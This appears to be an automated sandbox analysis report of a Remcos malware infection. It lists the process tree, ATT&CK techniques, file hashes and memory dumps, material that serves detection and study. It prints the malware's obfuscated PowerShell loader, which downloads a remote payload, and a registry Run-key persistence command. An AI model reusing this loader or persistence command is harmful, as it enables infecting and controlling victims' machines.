Kon.uStopprJ,aniiSoci,sdob,eeErythsGa,an=Frste(BlokeT.zygoeDaggesStraftSknsk-FrugtPHunstaFalsktNotifhBarra Beret$Bek eH JasmyElis s D dutmegalr,eltaeHydronVrksteK mik)Saute ') ;Theah (Sonorific 'Brais$VanedgPenall Sym.o Vagtb Morta DisplSlhun:scidrSErh.eaFaitelHamlia ExosmBeboeiFretst SilkaRadiukAdjustUr.diiMan.ak Tref=Hagge$SortbgConiol SmaaoIh.deb MetoasclerlBegar:HygriA Pri,tB nebrDompraSu cemPlatoeHaan.nNdigetDampm+Nicke+Hrels%Spred$ LysobCruciuPlantrFiberrImproelub,esSpadin Hjfoesynderg ublrTugtheBozosrEle tnUnteme Ce e..irnkc SquooR.adjuAus,inSupertAkmud ') ;$Metodikere=$burresnerrerne[$Salamitaktik];}$Nytaarsforstters=290753;$Burger=28097;Theah (Sonorific 'Su te$Kdbjegmanyml,ngreoLozenbSafflaUpa.vl Upst:RembuGJulegrDuodeaMistna Cat.t ,elioPersonNatureGloseshem gkUretmaAn.rtlUdbunaNonel1 Baad7 Spri4Velko e cre=Feuda CituaGNektoeExpertScu l- ermaCMar.ioj mfrnsherrtKapi eForhancreattPu hb ,sche$,lutrHcharlyLaborspa.tetselvrrTranse,bstenS,ksuetekst ');Theah (Sonorific ' orde$,hevegAlgyslTim eohle nb undfaNonfol Sece:SlvriKtaarnvRhymeaAfv krLanx.tOverssEr,onhueni.oPipedlAdmindAnpriiWhorlgAmphieBeh,t Fodgn=dist, ove.l[TimiaS korryVapousScupptTommee PersmDrabs.TnderCVoracodesign NeurvBenb,eNonmerNazart Skol] ands: Serv:KvittF.auturBaaseo .agemomhanBRedruaFemtasFim,reBagtp6Postb4 UnfoSUdtaltBa,tarSke.ci.overnBrkmigProta(Unlod$MicreGutumar Una aReg.oaSomretAbsoloUnre.nImmigeUdr dsUrenskMe,wia S.mmlHydr aBurma1Reca.7 Gene4Nonpe)Nephr ');Theah (Sonorific 'basta$ Konfg FabrlAnseeoApolob BantaTravelUddan:O.cipUkseskrRum toReb,ls IndskTeleoa RamebUda teStolenRege.dk.mmaeEpoch Refra=menig Count[ blegSRognfy BevgsU chatInt,lemansumTinou.B,lfrTdivule.xaspxRing ttytte. av tEomvisn InwecAsienoEvertdEksori PounnUnmingSlent]Top,e: Sgev: afskAAllo.SGyrenC unstIP.esaIUddan. UdstGEskameSamlitSl.ggSCo,metSolsprKom.aiM dunnDes.ogSepta( Blan$DanneKAcroavCantaaSin lrK,rrotLi.iesBenzohHierooForhelNonchdClo.riBelowgSokl,e pidi) Valo ');Theah (Sonorific ' Et e$Livs.gKonomlViberooutblbRutafadi.lelFodsb: .rhvAAccepuCol,ntBudeto Rrflm Unasa SkyltOp.roi .ogtsRangltBe,ol= havn$ FlodUSkjolrTripeoEffics SelvkDormpa Ra,ub Demae ubesnUdvand BorteVo.an.DekorsFol,euEnp.abSabelsfi ket k.atrCalipiInci.nCol,igStenk(G nvo$SjlegNWeeniyKaffet S,peaBssesaDeadyrMaks.sRomanf OpmaoIn qurS.ecisForsktLivretStevneEnurerAfkrisI rne,Nitr,$Pa,leBTempeuDip,or HydrgAltrueGgesnrKnage)Subma ');Theah $Automatist;"
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:316
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Propositionises.Lig && echo t"
    3⤵
    PID:1820
- - C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.Name) {$Sandsynligstenjucundity++;$Rvfulde230+='subst';$Rvfulde230+='r';}$Rvfulde230+='ing';Function Sonorific($Sandsynligsteffrit){$Gibbsite186=$Sandsynligsteffrit.Length-$Sandsynligstenjucundity;For( $Sandsynligste=5;$Sandsynligste -lt $Gibbsite186;$Sandsynligste+=6){$Myocyte+=$Sandsynligsteffrit.$Rvfulde230.'Invoke'( $Sandsynligste, $Sandsynligstenjucundity);}$Myocyte;}function Theah($Njagtigst){ . ($Aberrational) ($Njagtigst);}$Detacherer=Sonorific 'PickoMoversofyrstzMi,triFo,ral ,isplFejlvaSl,tn/Po.si5Smalf.tabel0Medby Cocur(NordfWAs ociUdp.nnTrampd Stngo.xhalwOrgonsHylde de ivNEgyptT Tidl rovi1Konst0Komme..mtre0 ozik;Puckl TvehW.kemaiindbrnMrket6Surp.4Li,ni;F.imu BalaxH pte6Collu4Diffe;.euph Phobir Indtvfiske: bu.s1Overr2,hino1Svamp.Dobbe0clino) Bha UdsynGBead.e RebecJazzmkZiegloHumou/indsk2Krush0Offic1Breds0Ref.r0Herns1Karto0 Aut 1Baetu L.tiFVavasiPris.rBuhkoeFli efDryppoImpulxArome/Remin1nutid2Rgnes1Serio.Tench0Persu ';$Tilbagekbets=Sonorific 'RulskUDuttesVitrieGottorFo.wa- HelcA nspigUnan.eCentin,emnitStri, ';$Metodikere=Sonorific 'VandfhMonertNoncotKuplep .ixtsUnedg:Nonte/D,pon/Ea.tedTjenerPyr.miUpwelv Decoeslu,e.Ostargl,genopea.ooMokkegLve alToraneOve.b.ContrcLgeploLedormStreg/Non,auKoftgc Ac i?DispeeRidsexhebripChampoSarinr ormitTartu=SociadSandeo Pencw IndknBrattl Polyo Tos,a Barodb.ssi& RequiTi,tnd Vedl=Hipli1Amphii urisgAnthoT Pronp HubbMAllofp Unex5AuthoU Tev,1Salts3 adaryClemm3 Nonuc ChesMGenpap ConcDSprog4HelsssTerrns LyssLRecrim PopuoHazeld u,enaR,pacWPhytoHMa,ap9Im,ot7BuffodballoZJohnaiBeltiF lumi ';$lymphogranulomas=Sonorific 'funkt>Mart, ';$Aberrational=Sonorific ' Exc.iD rkce PagexKnude ';$Sandsynligstenitialdeterminanten='Astroglia';$Multitudinary = Sonorific ',ninje ,avacStonihlovfsoCau,i Levir% ,leuaGenkepB,rgepGtestdmedaraindlrtBeshia Sy.t%Sylla\Fi kePF,rsvrRhachoFiffipForsioNasicsUdarbi HalutS,vsuiDekliob ugenevokeiCaph,sSpeedeLndstsIrrep.V disLErythidownhgComiq Mugni&sup a& Gamb Co,eneMosstcKattehMetago Fa,c NonstIntro ';Theah (Sonorific ' Kold$U hveg sprilDa,seoMacrobOveraapit.nlGorgl:Cypr,Pdigela ro,dpCry teSimplrProvs=Kikke(EkstrcPistamGe gpdHeeco Hedeg/Dekupc Kvad B.ss$PessiMMilliufr ttlAffectSaligiGrapht Fon u versds enjiGullbnEs oca SuborPewleyProvi)Fiant ');Theah (Sonorific ' valg$ salig FremlPita,o Kuveb A.rsaK.nsulMirki: EclibThrivuOverrr trocr Et.ieForkys S.abnUnw.xeUdsprr Sin.rVirileUnglorDrmmenRetteeStasi=Bilha$Und,sMUm,nde Unret Bit,osavskdunevoi fterkbonzeeSwararKvaliePropr.HaviosFejlrpTantalDiveri KdertReins(tidsk$KredslArmscyStignm B gjpumulih Hvl,oCavalgNeurorNemataGrundnGhaffuSporalBl.odoBismumLimebaMethosTorni) Komp ');Theah (Sonorific 'Jenom[Data,NSpri,e.ndavt Xylo.Herm,SDi teeSeminrRent v TatsiAf.nncMan.eeThermPSup ao Po.tiTinglnGeomotCreatMHvlbna,oebenNonvia ispug hylleCountrbaggr]Stu.l:.hoto:Ge.foSVermue Untac Cab uBakser Dekli NavntFlydey,ntriPO,erlrNonhyoHerbitVederoSnda crepanoArchglVelta Dona=Muffe Kre,e[BaromNnrkleeHaandtCy.is.EglamSReconeD.funcsymptuGer.irNetmeiDirektAcetyyVirklPFej hr ,fteoels,stDybdeo Latec E.icoAab.nlBerntTHalftyDomsmpPeri eEfter] E.hn:Agglu:CerebT MesalAutossUnher1Fysik2For a ');$Metodikere=$burresnerrerne[0];$Dishabituate= (Sonorific 'biome$SolilgBortelfuelioFlageb Ab,racuratlVideo:Ldr,uHAarsayKrsels Cy.ntOr.inaGru,ddUns,ee UnderNonusnSkalle jobs=optodNNegoteBlaynwBloke-Non.sOStan,b Re.ejUndereKids,cSteamtO mer Byel.S ApelyTerpesLivsttBe.pre F.gem alsk.Pre.iNBo.laeIsvint Uds,.SkotjW FarvecaginbPi.nuCJewellAndani Il,feUnjudn Ro.kt');$Dishabituate+=$Paper[1];Theah ($Dishabituate);Theah (Sonorific 'Kokos$RutscHTvangyLivbasudraatRewaraDitrodBeplaeTale.rGennenVa.iaeLov,y.,viksHUdskie .rsaa,dstrdWaughePrintrBersasCompl[ excl$ De,fTHutt,iBagatl BlombKlovnaApok,g MaalesynkokSpillbDomineKugletOut.rs Huma]M,rle=Dest.$WatchDElimieSubopta omiaCog acEpis.hNonreeNobelr rndeArbejrProso ');$Metalizations=Sonorific 'Zooge$Beg,nHJohniye kelsArkittentopaAbs.ldNaphteR.tiorS,rygnEmulseCoal,.subliDSeneso.onnewTilstnCon,elBi,rooungdoa R,abdE,damFOverbiRetirlC.rise F.rn(akrob$ReforMOpdraeBrud.tmu hfoAntrid phoniBermtkuvejseUtilirPretrehemme,Unpre$IdentHPrludyFor.jsR,distL,vemr ForeeReckvnDottieUnpac)bacch ';$Hystrene=$Paper[0];Theah (Sonorific ' Comb$For.sgPla,ilResbooLaasebBlokaaPursel Mods: PariSCap,lu Adkol CoshpOdisehbeniguSanafr Wob.iPacifslok,leIntelsRad o=G.ron(nifesTFejlieMohocsIsohyt.isse-EriksPtele.aTn.intSuperh Zill Ga,ac$Sy.teHFasanyFountsChitatB.samrStarte U,vinlodd,eSttte)Aban ');while (!$Sulphurises) {Theah (Sonorific ',eosc$ CarigS micl Pebeo.anklbbil.aa Tulll Pred:MentaKo eralB ggaa geregRudskeUnornsFormaa T.ndg UdhueIsraenUnexps Seni= Une,$ ,rontTyfonrMessauSkavgeSalpe ') ;Theah $Metalizations;Theah (Sonorific ' Un rSFo.ortZoanta fhrrGlottt Pa,f- CounSHarmllElecteBesseeBa,kcp.omic Skytt4,arad ');Theah (Sonorific 'pusse$Abomag TrawlPachyoKoncib L,udaTils.l Sur,:RetrySDragou LektlSquampDimerh Kon.uStopprJ,aniiSoci,sdob,eeErythsGa,an=Frste(BlokeT.zygoeDaggesStraftSknsk-FrugtPHunstaFalsktNotifhBarra Beret$Bek eH JasmyElis s D dutmegalr,eltaeHydronVrksteK mik)Saute ') ;Theah (Sonorific 'Brais$VanedgPenall Sym.o Vagtb Morta DisplSlhun:scidrSErh.eaFaitelHamlia ExosmBeboeiFretst SilkaRadiukAdjustUr.diiMan.ak Tref=Hagge$SortbgConiol SmaaoIh.deb MetoasclerlBegar:HygriA Pri,tB nebrDompraSu cemPlatoeHaan.nNdigetDampm+Nicke+Hrels%Spred$ LysobCruciuPlantrFiberrImproelub,esSpadin Hjfoesynderg ublrTugtheBozosrEle tnUnteme Ce e..irnkc SquooR.adjuAus,inSupertAkmud ') ;$Metodikere=$burresnerrerne[$Salamitaktik];}$Nytaarsforstters=290753;$Burger=28097;Theah (Sonorific 'Su te$Kdbjegmanyml,ngreoLozenbSafflaUpa.vl Upst:RembuGJulegrDuodeaMistna Cat.t ,elioPersonNatureGloseshem gkUretmaAn.rtlUdbunaNonel1 Baad7 Spri4Velko e cre=Feuda CituaGNektoeExpertScu l- ermaCMar.ioj mfrnsherrtKapi eForhancreattPu hb ,sche$,lutrHcharlyLaborspa.tetselvrrTranse,bstenS,ksuetekst ');Theah (Sonorific ' orde$,hevegAlgyslTim eohle nb undfaNonfol Sece:SlvriKtaarnvRhymeaAfv krLanx.tOverssEr,onhueni.oPipedlAdmindAnpriiWhorlgAmphieBeh,t Fodgn=dist, ove.l[TimiaS korryVapousScupptTommee PersmDrabs.TnderCVoracodesign NeurvBenb,eNonmerNazart Skol] ands: Serv:KvittF.auturBaaseo .agemomhanBRedruaFemtasFim,reBagtp6Postb4 UnfoSUdtaltBa,tarSke.ci.overnBrkmigProta(Unlod$MicreGutumar Una aReg.oaSomretAbsoloUnre.nImmigeUdr dsUrenskMe,wia S.mmlHydr aBurma1Reca.7 Gene4Nonpe)Nephr ');Theah (Sonorific 'basta$ Konfg FabrlAnseeoApolob BantaTravelUddan:O.cipUkseskrRum toReb,ls IndskTeleoa RamebUda teStolenRege.dk.mmaeEpoch Refra=menig Count[ blegSRognfy BevgsU chatInt,lemansumTinou.B,lfrTdivule.xaspxRing ttytte. av tEomvisn InwecAsienoEvertdEksori PounnUnmingSlent]Top,e: Sgev: afskAAllo.SGyrenC unstIP.esaIUddan. UdstGEskameSamlitSl.ggSCo,metSolsprKom.aiM dunnDes.ogSepta( Blan$DanneKAcroavCantaaSin lrK,rrotLi.iesBenzohHierooForhelNonchdClo.riBelowgSokl,e pidi) Valo ');Theah (Sonorific ' Et e$Livs.gKonomlViberooutblbRutafadi.lelFodsb: .rhvAAccepuCol,ntBudeto Rrflm Unasa SkyltOp.roi .ogtsRangltBe,ol= havn$ FlodUSkjolrTripeoEffics SelvkDormpa Ra,ub Demae ubesnUdvand BorteVo.an.DekorsFol,euEnp.abSabelsfi ket k.atrCalipiInci.nCol,igStenk(G nvo$SjlegNWeeniyKaffet S,peaBssesaDeadyrMaks.sRomanf OpmaoIn qurS.ecisForsktLivretStevneEnurerAfkrisI rne,Nitr,$Pa,leBTempeuDip,or HydrgAltrueGgesnrKnage)Subma ');Theah $Automatist;"
    3⤵
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4764
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Propositionises.Lig && echo t"
      4⤵
      System Location Discovery: System Language Discovery
      PID:1288
  - - C:\Program Files (x86)\windows mail\wab.exe
      "C:\Program Files (x86)\windows mail\wab.exe"
      4⤵
      Suspicious use of NtCreateThreadExHideFromDebugger
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Suspicious use of SetThreadContext
      System Location Discovery: System Language Discovery
      Suspicious behavior: MapViewOfSection
      Suspicious use of SetWindowsHookEx
      Suspicious use of WriteProcessMemory
      PID:1512
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "hyklere" /t REG_EXPAND_SZ /d "%Mouthwatering% -w 1 $Stumpiness=(Get-ItemProperty -Path 'HKCU:\Panicful132\').Reincited;%Mouthwatering% ($Stumpiness)"
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:4792
      - C:\Windows\SysWOW64\reg.exe
        
        REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "hyklere" /t REG_EXPAND_SZ /d "%Mouthwatering% -w 1 $Stumpiness=(Get-ItemProperty -Path 'HKCU:\Panicful132\').Reincited;%Mouthwatering% ($Stumpiness)"
        6⤵
        Adds Run key to start application
        System Location Discovery: System Language Discovery
        Modifies registry key
        
        PID:1528
    - - C:\Windows\SysWOW64\svchost.exe
        
        svchost.exe
        5⤵
        System Location Discovery: System Language Discovery
        Modifies registry class
        
        PID:4412
    - - C:\Windows\SysWOW64\svchost.exe
        
        svchost.exe
        5⤵
        System Location Discovery: System Language Discovery
        Modifies registry class
        
        PID:4176
    - - C:\Windows\SysWOW64\svchost.exe
        
        svchost.exe
        5⤵
        System Location Discovery: System Language Discovery
        Modifies registry class
        
        PID:940
    - - C:\Windows\SysWOW64\svchost.exe
        
        svchost.exe
        5⤵
        System Location Discovery: System Language Discovery
        Modifies registry class
        
        PID:4744
    - - C:\Windows\SysWOW64\svchost.exe
        
        svchost.exe
        5⤵
        System Location Discovery: System Language Discovery
        Modifies registry class
        
        PID:4376
    - - C:\Windows\SysWOW64\svchost.exe
        
        svchost.exe
        5⤵
        System Location Discovery: System Language Discovery
        Modifies registry class
        
        PID:1540
    - - C:\Windows\SysWOW64\svchost.exe
        
        svchost.exe
        5⤵
        System Location Discovery: System Language Discovery
        Modifies registry class
        
        PID:2376
    - - C:\Windows\SysWOW64\svchost.exe
        
        svchost.exe
        5⤵
        System Location Discovery: System Language Discovery
        Modifies registry class
        
        PID:1040
    - - C:\Windows\SysWOW64\svchost.exe
        
        svchost.exe
        5⤵
        System Location Discovery: System Language Discovery
        Modifies registry class
        
        PID:2120
    - - C:\Windows\SysWOW64\svchost.exe
        
        svchost.exe
        5⤵
        System Location Discovery: System Language Discovery
        Modifies registry class
        
        PID:1972
    - - C:\Windows\SysWOW64\svchost.exe
        
        svchost.exe
        5⤵
        System Location Discovery: System Language Discovery
        Modifies registry class
        
        PID:4140
    - - C:\Windows\SysWOW64\svchost.exe
        
        svchost.exe
        5⤵
        System Location Discovery: System Language Discovery
        Modifies registry class
        
        PID:372
    - - C:\Windows\SysWOW64\svchost.exe
        
        svchost.exe
        5⤵
        System Location Discovery: System Language Discovery
        Modifies registry class
        
        PID:4992
    - - C:\Windows\SysWOW64\svchost.exe
        
        svchost.exe
        5⤵
        System Location Discovery: System Language Discovery
        Modifies registry class
        
        PID:4344
    - - C:\Windows\SysWOW64\svchost.exe
        
        svchost.exe
        5⤵
        System Location Discovery: System Language Discovery
        Modifies registry class
        
        PID:3724
    - - C:\Windows\SysWOW64\svchost.exe
        
        svchost.exe
        5⤵
        System Location Discovery: System Language Discovery
        Modifies registry class
        
        PID:3080
    - - C:\Windows\SysWOW64\svchost.exe
        
        svchost.exe
        5⤵
        System Location Discovery: System Language Discovery
        Modifies registry class
        
        PID:1200
    - - C:\Windows\SysWOW64\svchost.exe
        
        svchost.exe
        5⤵
        System Location Discovery: System Language Discovery
        Modifies registry class
        
        PID:1988
    - - C:\Windows\SysWOW64\svchost.exe
        
        svchost.exe
        5⤵
        System Location Discovery: System Language Discovery
        Modifies registry class
        
        PID:3200
    - - C:\Windows\SysWOW64\svchost.exe
        
        svchost.exe
        5⤵
        System Location Discovery: System Language Discovery
        Modifies registry class
        
        PID:1796
    - - C:\Windows\SysWOW64\svchost.exe
        
        svchost.exe
        5⤵
        System Location Discovery: System Language Discovery
        Modifies registry class
        
        PID:4596
    - - C:\Windows\SysWOW64\svchost.exe
        
        svchost.exe
        5⤵
        System Location Discovery: System Language Discovery
        Modifies registry class
        
        PID:3768
    - - C:\Windows\SysWOW64\svchost.exe
        
        svchost.exe
        5⤵
        System Location Discovery: System Language Discovery
        Modifies registry class
        
        PID:400
    - - C:\Windows\SysWOW64\svchost.exe
        
        svchost.exe
        5⤵
        System Location Discovery: System Language Discovery
        Modifies registry class
        
        PID:812
    - - C:\Windows\SysWOW64\svchost.exe
        
        svchost.exe
        5⤵
        System Location Discovery: System Language Discovery
        Modifies registry class
        
        PID:2752
    - - C:\Windows\SysWOW64\svchost.exe
        
        svchost.exe
        5⤵
        System Location Discovery: System Language Discovery
        Modifies registry class
        
        PID:4460
    - - C:\Windows\SysWOW64\svchost.exe
        
        svchost.exe
        5⤵
        System Location Discovery: System Language Discovery
        Modifies registry class
        
        PID:3884
    - - C:\Windows\SysWOW64\svchost.exe
        
        svchost.exe
        5⤵
        System Location Discovery: System Language Discovery
        Modifies registry class
        
        PID:4860
    - - C:\Windows\SysWOW64\svchost.exe
        
        svchost.exe
        5⤵
        System Location Discovery: System Language Discovery
        Modifies registry class
        
        PID:3184
    - - C:\Windows\SysWOW64\svchost.exe
        
        svchost.exe
        5⤵
        System Location Discovery: System Language Discovery
        Modifies registry class
        
        PID:2952
    - - C:\Windows\SysWOW64\svchost.exe
        
        svchost.exe
        5⤵
        System Location Discovery: System Language Discovery
        Modifies registry class
        
        PID:2112
    - - C:\Windows\SysWOW64\svchost.exe
        
        svchost.exe
        5⤵
        System Location Discovery: System Language Discovery
        Modifies registry class
        
        PID:4816
    - - C:\Windows\SysWOW64\svchost.exe
        
        svchost.exe
        5⤵
        System Location Discovery: System Language Discovery
        Modifies registry class
        
        PID:3800
    - - C:\Windows\SysWOW64\svchost.exe
        
        svchost.exe
        5⤵
        System Location Discovery: System Language Discovery
        Modifies registry class
        
        PID:4532
    - - C:\Windows\SysWOW64\svchost.exe
        
        svchost.exe
        5⤵
        System Location Discovery: System Language Discovery
        Modifies registry class
        
        PID:1360
    - - C:\Windows\SysWOW64\svchost.exe
        
        svchost.exe
        5⤵
        System Location Discovery: System Language Discovery
        Modifies registry class
        
        PID:1528
    - - C:\Windows\SysWOW64\svchost.exe
        
        svchost.exe
        5⤵
        System Location Discovery: System Language Discovery
        Modifies registry class
        
        PID:3912
    - - C:\Windows\SysWOW64\svchost.exe
        
        svchost.exe
        5⤵
        System Location Discovery: System Language Discovery
        Modifies registry class
        
        PID:2692
    - - C:\Windows\SysWOW64\svchost.exe
        
        svchost.exe
        5⤵
        System Location Discovery: System Language Discovery
        Modifies registry class
        
        PID:1984
    - - C:\Windows\SysWOW64\svchost.exe
        
        svchost.exe
        5⤵
        System Location Discovery: System Language Discovery
        Modifies registry class
        
        PID:3920
    - - C:\Windows\SysWOW64\svchost.exe
        
        svchost.exe
        5⤵
        System Location Discovery: System Language Discovery
        Modifies registry class
        
        PID:5076
    - - C:\Windows\SysWOW64\svchost.exe
        
        svchost.exe
        5⤵
        System Location Discovery: System Language Discovery
        Modifies registry class
        
        PID:1632
    - - C:\Windows\SysWOW64\svchost.exe
        
        svchost.exe
        5⤵
        System Location Discovery: System Language Discovery
        Modifies registry class
        
        PID:4796
    - - C:\Windows\SysWOW64\svchost.exe
        
        svchost.exe
        5⤵
        System Location Discovery: System Language Discovery
        Modifies registry class
        
        PID:1668
    - - C:\Windows\SysWOW64\svchost.exe
        
        svchost.exe
        5⤵
        System Location Discovery: System Language Discovery
        Modifies registry class
        
        PID:1416
    - - C:\Windows\SysWOW64\svchost.exe
        
        svchost.exe
        5⤵
        System Location Discovery: System Language Discovery
        Modifies registry class
        
        PID:1332
    - - C:\Windows\SysWOW64\svchost.exe
        
        svchost.exe
        5⤵
        System Location Discovery: System Language Discovery
        Modifies registry class
        
        PID:2096
    - - C:\Windows\SysWOW64\svchost.exe
        
        svchost.exe
        5⤵
        System Location Discovery: System Language Discovery
        Modifies registry class
        
        PID:3464
    - - C:\Windows\SysWOW64\svchost.exe
        
        svchost.exe
        5⤵
        System Location Discovery: System Language Discovery
        Modifies registry class
        
        PID:4028
    - - C:\Windows\SysWOW64\svchost.exe
        
        svchost.exe
        5⤵
        System Location Discovery: System Language Discovery
        Modifies registry class
        
        PID:1288
    - - C:\Windows\SysWOW64\svchost.exe
        
        svchost.exe
        5⤵
        System Location Discovery: System Language Discovery
        Modifies registry class
        
        PID:1264
    - - C:\Windows\SysWOW64\svchost.exe
        
        svchost.exe
        5⤵
        System Location Discovery: System Language Discovery
        Modifies registry class
        
        PID:624
    - - C:\Windows\SysWOW64\svchost.exe
        
        svchost.exe
        5⤵
        System Location Discovery: System Language Discovery
        Modifies registry class
        
        PID:3952
    - - C:\Windows\SysWOW64\svchost.exe
        
        svchost.exe
        5⤵
        System Location Discovery: System Language Discovery
        Modifies registry class
        
        PID:1636

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:3188

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\remcos\logs.dat

Filesize
140B

MD5
9ee9cb0ba5eac94d4900abc93277eea2

SHA1
5a7b9c3064625884d86e53a00ca7c923443fea69

SHA256
7a75c77cefa4a25f574cc3b3c626f8b27867722609e58b0845ae609ea59e89fd

SHA512
f99733fb0927b074abc7246e6e1c6cb198526d9ff36df94bab6ec43a49c7e67aab45edbda97ff4ce96f9f872d7bdd6f2f5d243d194314c5aadda57fe8d4f4fc8

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_sdnhpoxx.0he.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Propositionises.Lig

Filesize
415KB

MD5
b82f0eb9f05f866eb2b7169ab64b4505

SHA1
a0eca5cb4a58a3f3d4b14f2092072cbf57d1f785

SHA256
a5bea0bfeae0ba139521c6830a2dc5cf7a17c1a052420441f7d3fd836d89a515

SHA512
27e009dd308c7c4aef7ecdd8e7f896948608f75cbd522752f59a8621d05ae6a658f80c42d3fdd6b3f2b704e3e16ef76da77f20799bedf2ea67a4716e96e4d9c8

Download Submit
memory/316-1-0x000002A6EA640000-0x000002A6EA662000-memory.dmp

Filesize
136KB

Download
memory/316-11-0x00007FF82A0B0000-0x00007FF82AB71000-memory.dmp

Filesize
10.8MB

Download
memory/316-12-0x00007FF82A0B0000-0x00007FF82AB71000-memory.dmp

Filesize
10.8MB

Download
memory/316-14-0x00007FF82A0B3000-0x00007FF82A0B5000-memory.dmp

Filesize
8KB

Download
memory/316-15-0x00007FF82A0B0000-0x00007FF82AB71000-memory.dmp

Filesize
10.8MB

Download
memory/316-61-0x00007FF82A0B0000-0x00007FF82AB71000-memory.dmp

Filesize
10.8MB

Download
memory/316-0-0x00007FF82A0B3000-0x00007FF82A0B5000-memory.dmp

Filesize
8KB

Download
memory/372-98-0x0000000000A30000-0x0000000000AB3000-memory.dmp

Filesize
524KB

Download
memory/372-99-0x0000000000A30000-0x0000000000AB3000-memory.dmp

Filesize
524KB

Download
memory/372-100-0x0000000000A30000-0x0000000000AB3000-memory.dmp

Filesize
524KB

Download
memory/940-66-0x0000000000F10000-0x0000000000F93000-memory.dmp

Filesize
524KB

Download
memory/940-65-0x0000000000F10000-0x0000000000F93000-memory.dmp

Filesize
524KB

Download
memory/940-67-0x0000000000F10000-0x0000000000F93000-memory.dmp

Filesize
524KB

Download
memory/1040-83-0x0000000000E60000-0x0000000000EE3000-memory.dmp

Filesize
524KB

Download
memory/1040-85-0x0000000000E60000-0x0000000000EE3000-memory.dmp

Filesize
524KB

Download
memory/1040-84-0x0000000000E60000-0x0000000000EE3000-memory.dmp

Filesize
524KB

Download
memory/1200-116-0x00000000008A0000-0x0000000000923000-memory.dmp

Filesize
524KB

Download
memory/1200-117-0x00000000008A0000-0x0000000000923000-memory.dmp

Filesize
524KB

Download
memory/1200-118-0x00000000008A0000-0x0000000000923000-memory.dmp

Filesize
524KB

Download
memory/1512-55-0x0000000002180000-0x0000000004BCA000-memory.dmp

Filesize
42.3MB

Download
memory/1512-54-0x0000000000F20000-0x0000000002174000-memory.dmp

Filesize
18.3MB

Download
memory/1540-79-0x00000000010D0000-0x0000000001153000-memory.dmp

Filesize
524KB

Download
memory/1540-78-0x00000000010D0000-0x0000000001153000-memory.dmp

Filesize
524KB

Download
memory/1540-77-0x00000000010D0000-0x0000000001153000-memory.dmp

Filesize
524KB

Download
memory/1796-129-0x0000000000140000-0x00000000001C3000-memory.dmp

Filesize
524KB

Download
memory/1796-128-0x0000000000140000-0x00000000001C3000-memory.dmp

Filesize
524KB

Download
memory/1796-127-0x0000000000140000-0x00000000001C3000-memory.dmp

Filesize
524KB

Download
memory/1972-93-0x0000000000540000-0x00000000005C3000-memory.dmp

Filesize
524KB

Download
memory/1972-92-0x0000000000540000-0x00000000005C3000-memory.dmp

Filesize
524KB

Download
memory/1972-91-0x0000000000540000-0x00000000005C3000-memory.dmp

Filesize
524KB

Download
memory/1988-121-0x0000000000970000-0x00000000009F3000-memory.dmp

Filesize
524KB

Download
memory/1988-120-0x0000000000970000-0x00000000009F3000-memory.dmp

Filesize
524KB

Download
memory/1988-119-0x0000000000970000-0x00000000009F3000-memory.dmp

Filesize
524KB

Download
memory/2120-88-0x0000000000600000-0x0000000000683000-memory.dmp

Filesize
524KB

Download
memory/2120-87-0x0000000000600000-0x0000000000683000-memory.dmp

Filesize
524KB

Download
memory/2120-89-0x0000000000600000-0x0000000000683000-memory.dmp

Filesize
524KB

Download
memory/2376-81-0x0000000000A00000-0x0000000000A83000-memory.dmp

Filesize
524KB

Download
memory/2376-80-0x0000000000A00000-0x0000000000A83000-memory.dmp

Filesize
524KB

Download
memory/2376-82-0x0000000000A00000-0x0000000000A83000-memory.dmp

Filesize
524KB

Download
memory/3080-115-0x0000000001250000-0x00000000012D3000-memory.dmp

Filesize
524KB

Download
memory/3080-113-0x0000000001250000-0x00000000012D3000-memory.dmp

Filesize
524KB

Download
memory/3080-114-0x0000000001250000-0x00000000012D3000-memory.dmp

Filesize
524KB

Download
memory/3200-123-0x0000000001200000-0x0000000001283000-memory.dmp

Filesize
524KB

Download
memory/3200-124-0x0000000001200000-0x0000000001283000-memory.dmp

Filesize
524KB

Download
memory/3200-125-0x0000000001200000-0x0000000001283000-memory.dmp

Filesize
524KB

Download
